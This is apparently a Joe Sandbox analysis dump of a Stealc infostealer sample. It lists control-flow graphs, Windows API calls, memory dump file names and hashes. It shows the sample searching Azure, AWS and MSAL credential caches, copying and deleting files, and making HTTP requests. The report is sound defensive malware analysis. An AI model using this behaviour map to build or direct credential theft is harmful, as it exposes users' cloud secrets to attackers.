                                                                                                                                                                            control_flow_graph 1550 77a790-77a7ac call 78aa70 1553 77a7ae-77a7bb call 78a820 1550->1553 1554 77a7bd-77a7d1 call 78aa70 1550->1554 1559 77a81d-77a88e call 78a740 call 78a9b0 call 78a8a0 call 78a800 call 788b60 call 78a920 call 78a8a0 call 78a800 * 2 1553->1559 1560 77a7d3-77a7e0 call 78a820 1554->1560 1561 77a7e2-77a7f6 call 78aa70 1554->1561 1593 77a893-77a89a 1559->1593 1560->1559 1561->1559 1568 77a7f8-77a818 call 78a800 * 3 call 771550 1561->1568 1587 77aedd-77aee0 1568->1587 1594 77a8d6-77a8ea call 78a740 1593->1594 1595 77a89c-77a8b8 call 78aad0 * 2 CopyFileA 1593->1595 1601 77a997-77aa7a call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a9b0 call 78a8a0 call 78a800 * 2 1594->1601 1602 77a8f0-77a992 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 1594->1602 1606 77a8d2 1595->1606 1607 77a8ba-77a8d4 call 78a7a0 call 7894d0 1595->1607 1659 77aa7f-77aa97 call 78aad0 1601->1659 1602->1659 1606->1594 1607->1593 1669 77ae8e-77aea0 call 78aad0 DeleteFileA call 78aa40 1659->1669 1670 77aa9d-77aabb 1659->1670 1681 77aea5-77aed8 call 78aa40 call 78a800 * 5 call 771550 1669->1681 1676 77ae74-77ae84 1670->1676 1677 77aac1-77aad5 GetProcessHeap RtlAllocateHeap 1670->1677 1686 77ae8b 1676->1686 1680 77aad8-77aae8 1677->1680 1687 77aaee-77abea call 78a740 * 6 call 78a7a0 call 771590 call 779e10 call 78aad0 StrCmpCA 1680->1687 1688 77ae09-77ae16 lstrlenA 1680->1688 1681->1587 1686->1669 1737 77abec-77ac54 call 78a800 * 12 call 771550 1687->1737 1738 77ac59-77ac6b call 78aa70 1687->1738 1690 77ae63-77ae71 memset 1688->1690 1691 77ae18-77ae4d lstrlenA call 78a7a0 call 771590 call 785190 1688->1691 1690->1676 1709 77ae52-77ae5e call 78a800 1691->1709 1709->1690 1737->1587 1743 77ac7d-77ac87 call 78a820 1738->1743 1744 77ac6d-77ac7b call 78a820 1738->1744 1750 77ac8c-77ac9e call 78aa70 1743->1750 1744->1750 1757 77acb0-77acba call 78a820 1750->1757 1758 77aca0-77acae call 78a820 1750->1758 1764 77acbf-77accf call 78aab0 1757->1764 1758->1764 1770 77acd1-77acd9 call 78a820 1764->1770 1771 77acde-77ae04 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 2 call 78a800 * 7 1764->1771 1770->1771 1771->1680
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078AA70: StrCmpCA.SHLWAPI(00000000,00791470,0077D1A2,00791470,00000000), ref: 0078AA8F
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0077AAC8
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0077AACF
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0077ABE2
                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077A8B0
                                                                                                                                                                              • Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
                                                                                                                                                                              • Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,00000000,00CFD8C8,00791318,00CFD8C8,00791314), ref: 0077ACEB
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791320), ref: 0077ACFA
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077AD0D
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791324), ref: 0077AD1C
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077AD2F
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791328), ref: 0077AD3E
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077AD51
                                                                                                                                                                            • lstrcatA.KERNEL32(?,0079132C), ref: 0077AD60
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077AD73
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791330), ref: 0077AD82
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077AD95
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791334), ref: 0077ADA4
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077ADB7
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0077AE0D
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0077AE1C
                                                                                                                                                                            • memset.MSVCRT ref: 0077AE6B
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D
                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0077AE97
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
                                                                                                                                                                            • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                            • API String ID: 4068497927-2709115261
                                                                                                                                                                            • Opcode ID: 46e990367b883ae2d58f96833a8fd6765e3f5224b70f2a468715f90fefaecf68
                                                                                                                                                                            • Instruction ID: 6d12f0ef0ad83516125157652fba3a0c237fed850dae2500f93a65fd7ba26011
                                                                                                                                                                            • Opcode Fuzzy Hash: 46e990367b883ae2d58f96833a8fd6765e3f5224b70f2a468715f90fefaecf68
                                                                                                                                                                            • Instruction Fuzzy Hash: 6912ED71950108FBEB09FBA0DD9AEEE7378AF54301F504169F506A6091DE3C6E0ADB72

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 00784D87
                                                                                                                                                                              • Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00784DB0
                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00784DCD
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
                                                                                                                                                                              • Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943
                                                                                                                                                                            • memset.MSVCRT ref: 00784E13
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00784E3C
                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00784E59
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
                                                                                                                                                                              • Part of subcall function 00784910: FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
                                                                                                                                                                              • Part of subcall function 00784910: FindClose.KERNEL32(000000FF), ref: 00784B92
                                                                                                                                                                            • memset.MSVCRT ref: 00784E9F
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00784EC8
                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00784EE5
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 007849B0
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,007908D2), ref: 007849C5
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 007849E2
                                                                                                                                                                              • Part of subcall function 00784910: PathMatchSpecA.SHLWAPI(?,?), ref: 00784A1E
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,00CFD8E8,?,000003E8), ref: 00784A4A
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FF8), ref: 00784A5C
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A70
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FFC), ref: 00784A82
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A96
                                                                                                                                                                              • Part of subcall function 00784910: CopyFileA.KERNEL32(?,?,00000001), ref: 00784AAC
                                                                                                                                                                              • Part of subcall function 00784910: DeleteFileA.KERNEL32(?), ref: 00784B31
                                                                                                                                                                            • memset.MSVCRT ref: 00784F2B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zax
                                                                                                                                                                            • API String ID: 4017274736-1448909124
                                                                                                                                                                            • Opcode ID: d02c0da8a176dc487a2b5e0c94380778d0140e437c415657ed9123f62e94722a
                                                                                                                                                                            • Instruction ID: 2e18459699c4a8f08194611f825bfb5750b6facbd05019306a748765ccbc6486
                                                                                                                                                                            • Opcode Fuzzy Hash: d02c0da8a176dc487a2b5e0c94380778d0140e437c415657ed9123f62e94722a
                                                                                                                                                                            • Instruction Fuzzy Hash: 544195B5980204A7DB54F770ED4BFDD3738AB14700F404594B649660C1FEBD9BD98B92

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077CF83
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0077D0C7
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0077D0CE
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,00CFD8C8,00791474,00CFD8C8,00791470,00000000), ref: 0077D208
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791478), ref: 0077D217
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077D22A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,0079147C), ref: 0077D239
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077D24C
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791480), ref: 0077D25B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077D26E
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791484), ref: 0077D27D
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077D290
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791488), ref: 0077D29F
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077D2B2
                                                                                                                                                                            • lstrcatA.KERNEL32(?,0079148C), ref: 0077D2C1
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077D2D4
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791490), ref: 0077D2E3
                                                                                                                                                                              • Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
                                                                                                                                                                              • Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0077D32A
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0077D339
                                                                                                                                                                            • memset.MSVCRT ref: 0077D388
                                                                                                                                                                              • Part of subcall function 0078AA70: StrCmpCA.SHLWAPI(00000000,00791470,0077D1A2,00791470,00000000), ref: 0078AA8F
                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0077D3B4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1973479514-0
                                                                                                                                                                            • Opcode ID: ec4b1a0c52f5e69c4887ee43bcfe4f957ca75a5413e8a24fc53cd9d51d2ca653
                                                                                                                                                                            • Instruction ID: 1456ca2986b24ff9a4829f257d1a40a17929e057b6e3fc30bb4d3f73e53d5745
                                                                                                                                                                            • Opcode Fuzzy Hash: ec4b1a0c52f5e69c4887ee43bcfe4f957ca75a5413e8a24fc53cd9d51d2ca653
                                                                                                                                                                            • Instruction Fuzzy Hash: ADE10DB1954108FBDB09FBA0DD9AEEE7378AF14301F504169F106A60A1DE3DAE05DB72

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2365 774880-774942 call 78a7a0 call 7747b0 call 78a740 * 5 InternetOpenA StrCmpCA 2380 774944 2365->2380 2381 77494b-77494f 2365->2381 2380->2381 2382 774955-774acd call 788b60 call 78a920 call 78a8a0 call 78a800 * 2 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a920 call 78a8a0 call 78a800 * 2 InternetConnectA 2381->2382 2383 774ecb-774ef3 InternetCloseHandle call 78aad0 call 779ac0 2381->2383 2382->2383 2469 774ad3-774ad7 2382->2469 2393 774ef5-774f2d call 78a820 call 78a9b0 call 78a8a0 call 78a800 2383->2393 2394 774f32-774fa2 call 788990 * 2 call 78a7a0 call 78a800 * 8 2383->2394 2393->2394 2470 774ae5 2469->2470 2471 774ad9-774ae3 2469->2471 2472 774aef-774b22 HttpOpenRequestA 2470->2472 2471->2472 2473 774ebe-774ec5 InternetCloseHandle 2472->2473 2474 774b28-774e28 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a9b0 call 78a8a0 call 78a800 call 78a920 call 78a8a0 call 78a800 call 78a740 call 78a920 * 2 call 78a8a0 call 78a800 * 2 call 78aad0 lstrlenA call 78aad0 * 2 lstrlenA call 78aad0 HttpSendRequestA 2472->2474 2473->2383 2585 774e32-774e5c InternetReadFile 2474->2585 2586 774e67-774eb9 InternetCloseHandle call 78a800 2585->2586 2587 774e5e-774e65 2585->2587 2586->2473 2587->2586 2588 774e69-774ea7 call 78a9b0 call 78a8a0 call 78a800 2587->2588 2588->2585
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
                                                                                                                                                                              • Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
                                                                                                                                                                              • Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00774915
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CFD998), ref: 0077493A
                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00774ABA
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00790DDB,00000000,?,?,00000000,?,",00000000,?,00CFD908), ref: 00774DE8
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00774E04
                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00774E18
                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00774E49
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00774EAD
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00774EC5
                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CFD988,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00774B15
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00774ECF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
